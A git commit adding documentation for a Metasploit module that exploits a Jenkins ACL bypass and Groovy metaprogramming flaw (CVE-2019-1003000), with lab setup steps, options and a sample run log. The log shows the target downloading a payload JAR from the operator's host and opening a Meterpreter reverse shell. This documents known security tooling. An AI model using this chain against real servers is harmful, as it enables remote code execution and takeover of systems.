Add module doc

master
William Vu 2019-03-16 00:39:22 -05:00
parent 621fa8e4db
commit b2c21c754f
1 changed files with 76 additions and 0 deletions


@ -0,0 +1,76 @@
## Intro
This module exploits a vulnerability in Jenkins dynamic routing to
bypass the `Overall/Read` ACL and leverage Groovy metaprogramming to
download and execute a malicious JAR file.
The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work
on later versions of Jenkins.
Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.
## Setup
1. `git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc`
2. `cd cve-2019-1003000-jenkins-rce-poc/sample-vuln`
3. Edit `run.sh` and change `2.152-alpine` to `2.137`
4. `./run.sh`
## Targets
```
Id Name
-- ----
0 Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)
```
## Options
**RPORT**
Set this to the Jenkins port. The default is 8080.
**TARGETURI**
Set this to the Jenkins base path. The default is `/`.
**SRVPORT**
Set this to the port on which to serve the payload. Change it from 8080
to something like 8081 if you are testing Jenkins locally on port 8080.
**ForceExploit**
Set this to `true` to override the `check` result during exploitation.
## Usage
```
msf5 exploit(multi/http/jenkins_metaprogramming) > run
[*] Started HTTPS reverse handler on https://192.168.1.2:8443
[*] Jenkins 2.137 detected
[+] Jenkins 2.137 is a supported target
[+] ACL bypass successful
[*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.1.2:8081/
[*] Sending Jenkins and Groovy go-go-gadgets
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.pom requested
[-] Sending 404
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
[+] Sending 200
[*] GET /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
[+] Sending payload JAR
[*] https://192.168.1.2:8443 handling request from 192.168.1.2; (UUID: qlrpxu6t) Staging java payload (54399 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.2:8443 -> 192.168.1.2:58688) at 2019-03-15 18:57:24 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '$HOME/.groovy/grapes/CarisaChristiansen' on the target
meterpreter > getuid
Server username: jenkins
meterpreter > sysinfo
Computer : 6f21b8da2915
OS : Linux 4.9.93-linuxkit-aufs (amd64)
Meterpreter : java/linux
meterpreter >
```
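Review bot: the Targets row "Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)" claims an upper bound on the plugin version, but the Intro only says the module was "Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61" and scopes the ACL bypass gadget to Jenkins <= 2.137; please state whether 2.61 is a confirmed plugin ceiling or simply the version tested, so users reading the Targets table are not misled. Two smaller documentation points in the same file: the ForceExploit option says it overrides "the `check` result", yet nothing in the doc explains what `check` verifies (the Usage log only shows "Jenkins 2.137 detected" / "is a supported target"), so a sentence describing the version check would help; and the final log line warns that '$HOME/.groovy/grapes/CarisaChristiansen' may require manual cleanup on the target, which is worth calling out in the doc body (for example under Usage) rather than leaving it buried in sample output, since it is the persistent artifact an operator or defender would look for.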